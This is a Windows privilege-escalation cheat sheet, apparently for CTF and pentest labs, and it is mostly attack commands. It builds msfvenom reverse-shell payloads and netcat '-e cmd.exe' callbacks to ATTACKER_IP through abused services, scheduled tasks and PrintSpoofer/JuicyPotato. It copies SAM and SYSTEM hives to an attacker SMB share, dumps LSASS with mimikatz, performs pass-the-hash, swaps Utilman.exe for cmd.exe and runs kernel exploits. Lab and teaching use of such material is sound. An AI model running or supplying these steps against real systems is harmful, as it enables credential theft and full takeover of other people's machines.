Windows Deployment Services
Windows Deployment Services (WDS) enables you to deploy Windows operating systems over the network. When installing Windows on a large number of host administrators may use WDS. These types of installations are called unuattended installations. The following locations may have adminstrator credentials.
PowerShell History
Whenever a user runs a command using Powershell, it gets stored into a file that keeps a memory of past commands.
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type $Env:userprofile\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
IIS Configuration
Internet Information Services (IIS) is the default web server on Windows installations. The configuration files are stored in the following locations.
PuTTY
PuTTY is an SSH client commonly found on Windows systems. You can get PuTTY proxy configurations as follows.
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions /f "Proxy" /s
AlwaysInstallElevated
Allows the user to run and install any .msi file with system level privileges.
Check if the AlwaysInstallElevated registry value is set on both current user and system.
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
Use msfvenom to create a malicious .msi file.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKING_MACHINE_IP LPORT=LOCAL_PORT -f msi -o malicious.msi
Start a netcat listener.
nc -lvnp 4444
Transfer the malicious.msi file to the victim machine and execute it to get a reverse shell.
msiexec /q /i malicious.msi
Scheduled Tasks
Task Scheduler is a job scheduler in Windows that launches computer programs or scripts at pre-defined times or after specified time intervals. Looking into scheduled tasks on the target system, you may see a scheduled task that either lost its binary or it's using a binary you can modify.
icacls c:\tasks\schtask.bat
echo c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4444 > C:\tasks\schtask.bat
Unquoted Service Path
Unquoted Service Paths is a vulnerability where a Windows service contains spaces and isn't enclosed within quotes. This vulnerability occurs due to the way the Windows SCM searches for executables.
Say we have a service path as such:
C:\Program Files\Development Files\Devservice Files\Service.exe
In order to run Service.exe, the system will search the following paths first.
With one of the unquoted service path being vulnerable, we can use msfvenom to exploit.
msfvenom -p windows/shell_reverse_tcp LHOST=10.6.17.185 LPORT=4444 -f exe -o Devservice.exe
Since this is a service, you will need to either wait till the service executes, manually restart the service, or restart the machine with
shutdown /r /t 0
.Event Log Reader
Members of this group can read event logs from local computers. We can use this privilege to read the Security log and search for passwords.
Search security logs using wevutil
wevtutil qe Security /rd:true /f:text | Select-String "/user"
Search security logs using Get-WinEvent. Note: Searching the `Security` event log with `Get-WInEvent` requires administrator access or permissions adjusted on the registry key `HKLM\System\CurrentControlSet\Services\Eventlog\Security`. Membership in just the `Event Log Readers` group is not sufficient.
Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*'} | Select-Object @{name='CommandLine';expression={ $_.Properties[8].Value }}
Server Operators
The Server Operators group allows members to administer Windows servers without needing assignment of Domain Admin privileges. Membership of this group confers the powerful `SeBackupPrivilege` and `SeRestorePrivilege` privileges and the ability to control local services.
Download PsService from Sysinternals suite. This tool is similar to the `sc` utility and can display service status and configurations and also allow you to start, stop, pause, resume, and restart services both locally and on remote hosts.
wget https://download.sysinternals.com/files/PSTools.zip
Run PsService.exe on a service until you find one that has SERVICE_ALL_ACCESS access rights for the Server Operators group.
PsService.exe security AppReadiness
With SERVICE_ALL_ACCESS rights, we can modify the binary path of the service to execute a command which adds our current user to the local administrators group.
sc.exe config {SERVICE} binPath= "cmd /c net localgroup Administrators {USER} /add"
sc.exe config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add"
Start the service
sc.exe start AppReadiness
Confirm that we were added to local administrators group
net localgroup Administrators
Dump NTLM hashs
secretsdump.py server_adm@10.129.43.9 -just-dc-user administrator
Print Operators - SeLoadDriverPrivilege
The SeLoadDriverPrivilege speifies the users who are allowed to dynamically load device drivers. The activation of this policy in the context of non-privileged users implies a significant risk due to the possibility of executing code in kernel space.
Check if you have SeLoadDriverPrivilege.
The compiled executables are available here:
https://github.com/JoshMorrison99/SeLoadDriverPrivilege
Compile a reverse shell with msfvenom into a file called `rev.exe.
msfvenom -p windows/x64/shell_reverse_tcp LHOST={ATTACKER_IP} LPORT=4444 -f exe -o rev.exe
Transfer Capcom.sys, LoadDriver.exe, rev.exe and ExploitCapcom.exe to victim machine.
Invoke LoadDriver.exe. This should return NTSTATUS: 00000000, WinError: 0. If it doesn't try changing the location of Capcom.sys or where you are executing LoadDriver.exe
.\LoadDriver.exe System\CurrentControlSet\MyService {C:\Users\Test\Capcom.sys}
Start a netcat listener on port 4444
Put rev.exe in C:\Windows\temp\rev.exe and execute ExploitCapcom.exe. C:\Windows\temp\rev.exe is the default location the program will search for the reverse shell executable.
.\ExploitCapcom.exe
You can also specify your own path to the reverse shell like so:
.\ExploitCapcom.exe C:\Windows\Place\to\reverseshell\rev.exe
Backup Operators - SeBackupPrivilege & SeRestorePrivilege
The SeBackup privilege allows users to read any file on the file system. The SeRestore privilege allows users to write to any file in the system.
Check privileges with the command:
whoami /priv
Note: If you are of the group
BUILTIN\Backup Operators
, then you can perform this privilege escalation as well.whoami /all
Backup the SAM and SYSTEM hives
reg save hklm\sam C:\temp\sam.hive
reg save hklm\system C:\temp\system.hive
Start an SMB server to copy the files to your local machine
mkdir share
smbserver.py -smb2support -username {username} -password {password} public share
Copy the SAM and SYSTEM hives to the SMB server.
copy C:\temp\sam.hive \\ATTACKER_IP\public\
copy C:\temp\system.hive \\ATTACKER_IP\public\
Use pypykatz to extract the hashes from SAM and SYSTEM.
pypykatz registry --sam sam.hive system.hive
Use the Administrator's hash to perform a Pass-the-Hash attack.
psexec.py -hashes {hash} Administrator@{IP}
SeBackupPrivilege
The SeBackupPrivilege allows us to traverse any folder and list the folder contents. This will let us copy a file from a folder, even if there is no access control entry (ACE) for us in the folder's access control list (ACL). However, we can't dothis using the standard copy command. Instead, we need to programmatically copy the data, making sure to specify the FILE_FLAG_BACKUP_SEMANTICS flag.
Download the PoC from here: https://github.com/giuliano108/SeBackupPrivilege
wget https://github.com/giuliano108/SeBackupPrivilege/blob/master/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeCmdLets.dll
wget https://github.com/giuliano108/SeBackupPrivilege/blob/master/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeUtils.dll
Import the module.
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
If `SeBackupPrivilege` is disabled, you can enable it with the command:
Set-SeBackupPrivilege
We can now access files we don't have permissions to with the following command
Copy-FileSeBackupPrivilege 'C:\Users\Administrators\flag.txt' .\flag.txt
SeTakeOwnershipPrivilege
SeTakeOwnershipPrivilege grants a user the ability to take ownership of any "securable object", meaning Active Directory object, NTFS file/folders, printers, registry keys, services, and processes. For CTF purposes, we can take ownership of `C:\Users\Administrator\Desktop\flag.txt` to read the flag.
Use the `takeown` command to take ownership of a file you want to read.
takeown /f 'C:\Users\Administrator\Desktop\flag.txt'
We may not be able to read the file even when we own it. We will need to modify the file ACL using the `icacls` command.
icacls 'C:\Users\Administrator\Desktop\flag.txt' /grant {USER}:F
SeTakeOwnershipPrivilege RDP
SeTakeOwnership privilege allows a user to take ownership of any object on the system, including files and registry keys.
Take ownership of Utilman.exe
takeown /f C:\Windows\System32\Utilman.exe
Grant yourself proper permissions over Utilman.exe
icacls C:\Windows\System32\Utilman.exe /grant {user}:F
Replace Utilman.exe with cmd.exe
copy cmd.exe utilman.exe
Lock the screen.
Click on "Ease of Access" button to launch cmd as System.
SeDebugPrivilege
The SeDebugPrivilege policy setting determines which users can attach to or open any process, even a process they do not own. Developers who are debugging their applications do not need this user right. Developers who are debugging new system components need this user right. This user right provides access to sensitive and critical operating system components.
With the SeDebugPrivilege we have privileges to dump process memory from any process. We can use ProcDump from the SysInternal suite to dump the Local Security Authority Subsytem Service (LSASS) process, which stores user credentials after a user logs on to a system.
Download ProcDump
wget https://download.sysinternals.com/files/Procdump.zip
If you need to be discrete, then transfer the LSASS procdump to your Attacker machine and use mimikatz locally. If you don't need to be discrete then transfer mimikatz to the Victim machine and use it there.
32-bit
wget https://github.com/ParrotSec/mimikatz/blob/master/Win32/mimikatz.exe
64-bit
wget https://github.com/ParrotSec/mimikatz/blob/master/x64/mimikatz.exe
Transfer ProcDump and mimikatz to victim machine.
Run ProcDump on LSASS. Process dump is saved to a file called `lsass.dmp`
procdump.exe -accepteula -ma lsass.exe lsass.dmp
Run mimikatz to extract logon passwords from LSASS
mimikatz.exe
mimikatz # log
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonpasswords
The output from mimikatz should give you the NTLM password hash of users in the LSASS memory.
SeImpersonatePrivilege PrintSpoofer
The SeImpersonatePrivilege policy setting determines which programs are allowed to imersonate a user or another specified account and act on behalf of the user. Legitimate programs may utilize SeImpersonatePrivilege to gain additional privileges.
Chech privileges for
SeImpersonatePrivilege
Download PrintSpoofer.
32-bit
wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer32.exe
64-bit
wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe
Download Netcat
wget https://github.com/int0x33/nc.exe/raw/master/nc.exe
Transfer PrintSpoofer and Netcat to victim machine.
Start a Netcat listener on Attacker machine
nc -lvnp 4444
Execute PrintSpoofer. `-c "c:\tools\nc.exe <ATTACKER_IP> 4444 -e cmd"` is to execute a command. We are using `nc.exe` to spawn a reverse shell.
c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe {ATTACKER_IP} 4444 -e cmd"
After executing PrintSpoofer, you should have a reverse shell on your Attacker machine as Nt Authority\System.
SeImpersonatePrivilege JuicyPotato
JuicyPotato doesn't work on Windows Server 2019 and Windows 10 build 1809 onwards.
The SeImpersonatePrivilege policy setting determines which programs are allowed to imersonate a user or another specified account and act on behalf of the user. Legitimate programs may utilize SeImpersonatePrivilege to gain additional privileges.
Download JuicyPotato
wget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe
Download Netcat
wget https://github.com/int0x33/nc.exe/raw/master/nc.exe
Transfer JuicyPotato and Netcat to the Victim machine.
Start a Netcat listener on Attacker machine
nc -lvnp 4444
Execute JuicyPotato. `-l 53375` is the COM listening port. `-p c:\windows\system32\cmd.exe` is the program to launch. `-a "/c c:\tools\nc.exe 10.10.14.3 8443 -e cmd.exe"`. `-t *` is the createprocess call.
c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe {ATTACKER_IP} 4444 -e cmd.exe" -t *
After execution, you should have a shell as NT Authority\System
SeAssignPrimaryToken JuicyPotato
JuicyPotato doesn't work on Windows Server 2019 and Windows 10 build 1809 onwards.
The SeAssignPrimaryTokenPrivilege policy setting allows a process to replace a process level token.
Download JuicyPotato
wget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe
Download Netcat
wget https://github.com/int0x33/nc.exe/raw/master/nc.exe
Transfer JuicyPotato and Netcat to the Victim machine.
Start a Netcat listener on Attacker machine
nc -lvnp 4444
Execute JuicyPotato. `-l 53375` is the COM listening port. `-p c:\windows\system32\cmd.exe` is the program to launch. `-a "/c c:\tools\nc.exe 10.10.14.3 8443 -e cmd.exe"`. `-t *` is the createprocess call.
c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe {ATTACKER_IP} 4444 -e cmd.exe" -t *
After execution, you should have a shell as NT Authority\System
MS09-012 Churrasco
Windows Server 2003 or Windows XP.
Windows Server 2003 Vulnerability.
Get churrasco.exe
wget https://github.com/Re4son/Churrasco/raw/master/churrasco.exe
Get nc.exe
wget https://github.com/int0x33/nc.exe/raw/master/nc.exe
Transfer churrasco.exe and nc.exe to victim machine
smbserver.py kali .
copy \\{attackerIP}\kali\{file} .
Start nc listener on attacker machine
nc -lvnp 5555
Run the exploit and get a callback to attacker machine
.\churrasco.exe "C:\Tools\nc.exe -e cmd.exe {ATTACKER_IP} 5555"
MS15-051
Windows 8.1 (and before)
A privilege escalation vulnerability exists due to the Win32k.sys kernel-mode driver improperly handling objects in memory. A local attacker can exploit this flaw, via a specially crafted application, to execute arbitrary code in kernel mode.
Download the privilege escalation executable
wget https://github.com/SecWiki/windows-kernel-exploits/raw/master/MS15-051/MS15-051-KB3045171.zip
Start an smbserver
smbserver.py kali .
Execute `ms15-051x64.exe`
\\10.10.14.2\kali\ms15-051x64.exe "whoami"
The above command can only execute one command as system. We want to spawn a reverse shell as system.
\\10.10.14.2\kali\ms15-051x64.exe "\\10.10.14.2\kali\ncat.exe -e cmd.exe 10.10.14.2 5555"